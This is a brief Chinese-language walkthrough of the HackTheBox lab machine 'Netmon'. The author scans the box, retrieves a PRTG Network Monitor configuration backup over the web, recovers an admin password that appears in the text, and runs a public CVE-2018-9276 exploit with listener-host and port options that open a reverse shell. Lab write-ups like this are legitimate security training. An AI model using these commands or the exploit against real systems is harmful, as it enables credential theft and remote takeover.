Netmon - HackTheBox
nmap扫描
先看80
左下方发现了程序名字prtg network monitor
和版本18.1.37
,搜一下看看
就一个rce,还是需要账号密码
在看看21
貌似,有点直接
网站目录下没有任何文件
https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
在这发现了目录路径
.bak貌似是个备份文件,下载下来
wget http://10.10.10.152/ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.old.bak
找着密码了
还是不对,搜了wp才知道,这玩意是备份密码,现在的密码把2018改成了2019,这谁想得到啊
PrTg@dmin2019
登录后台,现在有了账号密码,去试试那个rce
https://github.com/A1vinSmith/CVE-2018-9276
python cve.py -i 10.10.10.152 -p 80 --lhost 10.10.14.12 --lport 7777 --user prtgadmin --password 'PrTg@dmin2019'